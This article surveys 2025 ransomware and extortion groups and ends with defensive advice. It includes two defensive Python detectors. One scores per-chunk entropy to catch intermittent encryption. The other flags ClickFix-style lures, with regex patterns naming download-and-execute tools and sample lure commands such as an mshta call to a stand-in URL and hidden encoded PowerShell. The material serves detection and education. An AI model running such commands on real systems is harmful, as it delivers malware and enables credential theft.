Ransomware in 2025: A New Era of Identity Targeting
If 2024 saw ransomware's resurgence, 2025 marked a clear pivot toward targeting personal identities. Cybercriminals have moved from breaching networks to homing in on individuals and the credentials, sessions and identity records that stand in for them. Which groups are at the forefront of this trend?
The Cybercriminal Toolbox: AI and Manipulation
The modern cybercriminal toolkit is diverse and increasingly sophisticated. At its core are social engineering, deepfakes and AI-assisted chat tools, which turn everyday communication channels into attack vectors. A single stolen password or a convincingly impersonated phone call can be enough to obtain access to internal systems. Because the attacker then logs in with legitimate credentials, conventional perimeter controls see nothing wrong, and that is what makes identity manipulation so effective.
AI’s Role in Identity Manipulation
Artificial intelligence is reshaping how cybercrime operates. It is no longer just about ransomware encrypting files: attackers now use AI for phishing, voice cloning and even fake job interviews. These techniques enable a kind of deception against which traditional defenses are far less effective. While ransomware is no longer setting records, the extortion economy has settled at a high level, shifting its weight from blunt encrypt-everything attacks toward stealing data and using it as leverage.
The Six Most Notorious Cybercriminal Groups of 2025
According to OpenText's annual Nastiest Malware Report, six groups shaped the cyber landscape this year more than any others.
1. Qilin (aka Agenda)
Qilin was linked to over 200 confirmed attacks, many against hospitals, laboratories and community facilities. In one case, the failure of diagnostic services caused by the attack contributed to a patient's death. Qilin's ransomware panel includes a chat function through which affiliates can communicate directly with professional negotiators, a degree of professionalization in the ransomware-as-a-service (RaaS) model not seen before.
2. Akira
Akira, which targets financially strong companies and managed service providers, accounted for nearly 20% of global ransomware incidents. The group's operations are marked by technical precision and streamlined processes, including a systematic approach to negotiations. Its affiliate recruitment and branding resemble those of a legitimate company, which has made it a reliable RaaS platform. Akira gains entry by exploiting VPN vulnerabilities and operates on a global scale.
3. Scattered Spider
One of the most influential groups of 2025, Scattered Spider used social engineering, SIM swapping and deepfake voice impersonation to compromise large organizations. Although law enforcement arrested core members in September, the group's techniques live on through copycats and spin-offs. Its blend of psychological manipulation and targeted identity exploitation has made it a formidable player in the initial-access trade.
4. Play Ransomware
Despite receiving less media attention, Play emerged as one of the most destructive groups, compromising over 900 managed service providers. Its signature tactic is intermittent encryption: only parts of each file are encrypted, which shortens the time the ransomware needs to run and defeats detections that look for fully encrypted, high-entropy files. Play's toolset also targets virtualized environments, turning the IT dependencies an organization relies on into the point of attack.
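Why intermittent encryption slips past a naive check, as an added example that is not from the report or from any ransomware sample: the script below builds three constructed buffers (a repetitive plaintext, a fully "encrypted" one, and one in which every other 4 KiB chunk is replaced) and scores them with whole-file versus per-chunk Shannon entropy. Seeded pseudo-random bytes stand in for ciphertext; the alternating-chunk layout, the 4 KiB chunk size and the 7.5 bits-per-byte threshold are illustrative assumptions, not Play's actual scheme.

```python
import math
import random
from typing import Dict, List

CHUNK = 4096        # chunk size the detector scores (assumption, not Play's value)
THRESHOLD = 7.5     # bits per byte above which a chunk is treated as ciphertext (assumption)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or single-valued input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def chunk_entropies(data: bytes, chunk: int = CHUNK) -> List[float]:
    """Entropy of each fixed-size chunk, so a partially encrypted file cannot hide behind its average."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]


def classify(data: bytes, chunk: int = CHUNK, threshold: float = THRESHOLD) -> str:
    """'plaintext', 'encrypted' or 'partially_encrypted', based on how many chunks look like ciphertext."""
    ents = chunk_entropies(data, chunk)
    high = sum(1 for e in ents if e >= threshold)
    if high == 0:
        return "plaintext"
    if high == len(ents):
        return "encrypted"
    return "partially_encrypted"


def whole_file_verdict(data: bytes, threshold: float = THRESHOLD) -> str:
    """The naive check: a single entropy value for the whole file."""
    return "encrypted" if shannon_entropy(data) >= threshold else "plaintext"


def make_samples(size: int = 64 * 1024, seed: int = 1234) -> Dict[str, bytes]:
    """Constructed test buffers; seeded random bytes stand in for ciphertext."""
    rng = random.Random(seed)
    line = b"2025-01-01 12:00:00 INFO request ok\n"          # constructed, log-like plaintext
    plain = (line * (size // len(line) + 1))[:size]
    full = bytes(rng.getrandbits(8) for _ in range(size))
    # Intermittent layout (illustrative): even-numbered chunks replaced, odd chunks left untouched.
    parts = []
    for idx, off in enumerate(range(0, size, CHUNK)):
        block = plain[off:off + CHUNK]
        parts.append(bytes(rng.getrandbits(8) for _ in range(len(block))) if idx % 2 == 0 else block)
    return {"plain": plain, "full": full, "partial": b"".join(parts)}


if __name__ == "__main__":
    for name, buf in make_samples().items():
        print(f"{name:8s} whole-file={whole_file_verdict(buf):10s} "
              f"per-chunk={classify(buf):20s} H={shannon_entropy(buf):.2f}")
```

Because half of the "partial" buffer is still low-entropy text, its whole-file entropy lands well below the ciphertext threshold and the naive check calls it plaintext; only scoring per chunk reveals that half the file has already been rewritten. A production detector would also track how many files per process cross that state in a short window, since a single partially encrypted file is not by itself alarming.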
5. ShinyHunters
ShinyHunters infiltrates cloud platforms and often remains hidden for long periods before releasing stolen data. Victims included major brands such as Google and Salesforce. The group has shown strategic agility by timing the release of stolen information to coincide with regulatory notification deadlines, turning the victim's compliance exposure into extortion leverage: a troubling convergence of cybercrime and regulatory pressure.
6. Lumma Stealer
Regarded as the backbone of many ransomware operations, Lumma Stealer harvests credentials, session cookies and authentication tokens from compromised systems. The data soon circulates on darknet markets, where it becomes initial-access material for groups such as Akira, Qilin and Play. The malware's reach is amplified by social-engineering delivery, notably fake error messages that instruct users to run a command themselves, so the first malicious execution is performed by the victim rather than by an exploit, sidestepping conventional defenses.
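A detection-side illustration, added here and not taken from the report or from Lumma itself: in the commonly documented form of this lure the victim is told to paste a command into the Run dialog or a terminal, so the telling artifact is a script interpreter launched from the user's own desktop shell with download-and-execute arguments. The script below scores constructed process-creation events on exactly that combination. The field names, the parent/child pairing and the command-line patterns are assumptions modelled on typical endpoint telemetry; the base64 string and the host name in the samples are made up.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str     # assumed field names, modelled on EDR/Sysmon process-creation events
    image: str
    command_line: str


# A user pasting into Run (Win+R) or a console shows up as explorer.exe -> interpreter (assumption).
USER_SHELLS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that point to download-and-execute rather than an ordinary script run.
SUSPICIOUS_ARGS = [
    ("encoded command", re.compile(r"(?<![\w-])-(e|ec|enc|encodedcommand)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote fetch", re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget)\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("mshta from url", re.compile(r"\bmshta(\.exe)?\s+\"?https?://", re.I)),
]


def suspicious_traits(command_line: str) -> List[str]:
    """Labels of every suspicious pattern found in the command line."""
    return [label for label, rx in SUSPICIOUS_ARGS if rx.search(command_line)]


def from_user_shell(ev: ProcEvent) -> bool:
    """True when an interpreter was started directly by the user's desktop shell."""
    return ev.parent_image.lower() in USER_SHELLS and ev.image.lower() in INTERPRETERS


def is_clickfix_like(ev: ProcEvent) -> bool:
    """Alert only when both conditions coincide; either one alone is common in normal admin activity."""
    return from_user_shell(ev) and bool(suspicious_traits(ev.command_line))


def triage(events: List[ProcEvent]) -> List[Tuple[ProcEvent, List[str]]]:
    """Return the flagged events together with the traits that triggered them."""
    return [(ev, suspicious_traits(ev.command_line)) for ev in events if is_clickfix_like(ev)]


# Constructed sample events (not real telemetry). The base64 decodes to plain ASCII letters.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell -w hidden -enc QUJDREVGR0hJSktMTU5P"),            # pasted lure command
    ProcEvent("explorer.exe", "mshta.exe",
              "mshta https://example.invalid/verify.hta"),                   # pasted lure command
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"),     # admin running a local script
    ProcEvent("svchost.exe", "powershell.exe",
              "powershell -enc QUJDREVGR0hJSktMTU5P"),                      # scheduled task, no user shell
]


if __name__ == "__main__":
    for ev, traits in triage(SAMPLE_EVENTS):
        print(f"ALERT {ev.parent_image} -> {ev.image}: {', '.join(traits)} :: {ev.command_line}")
```

The third and fourth samples show why the rule requires both signals: an interpreter started from the desktop with a local script is routine, and an encoded command from a service parent is routine for scheduled tasks, so neither alone should page anyone. Real deployments should add the lure's own footprint (the browser process that rendered the fake error page shortly before) and the network destination of the fetched payload.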
The Evolving Landscape of Ransomware
The ransomware scene remains highly lucrative, despite more protective measures and a growing number of organizations refusing to pay. Although ransom amounts have plateaued, total financial losses continue to rise, evidence that better defenses have changed the form of the damage rather than removed it, as organized criminals adapt their strategies.
While some groups struggle to enforce their demands, others continue to negotiate multi-million-dollar settlements with chilling efficiency. Ransomware has matured into a sophisticated business model, which makes robust defensive measures all the more necessary.
Implementing Effective Defense Strategies
Organizations must respond to these threats in a structured and well-organized way.
- Regular patching: keeping systems current closes the vulnerabilities attackers exploit; internet-facing VPN and remote-access appliances, a favored entry point for groups such as Akira, deserve priority.
- Credible backup strategies: frequent backups, with at least one copy kept offline or immutable and restores tested regularly, limit the damage an attack can do.
- Robust access controls: least-privilege access to sensitive data and phishing-resistant MFA reduce the risk of unauthorized entry; unlike SMS codes, phishing-resistant factors are not defeated by the SIM swapping Scattered Spider relies on.
- Hardened remote access: enforcing MFA on remote connections, patching the gateways and restricting who may use them prevents exploitation through remote-work infrastructure.
- Awareness training: continually educating employees on social-engineering tactics, including the fake error messages used to deliver Lumma Stealer, and giving help-desk staff a verification procedure for password and MFA resets, enables them to recognize and report attempts.
Establishing these practices not only improves an organization's ability to respond but also reduces its exposure over the long term.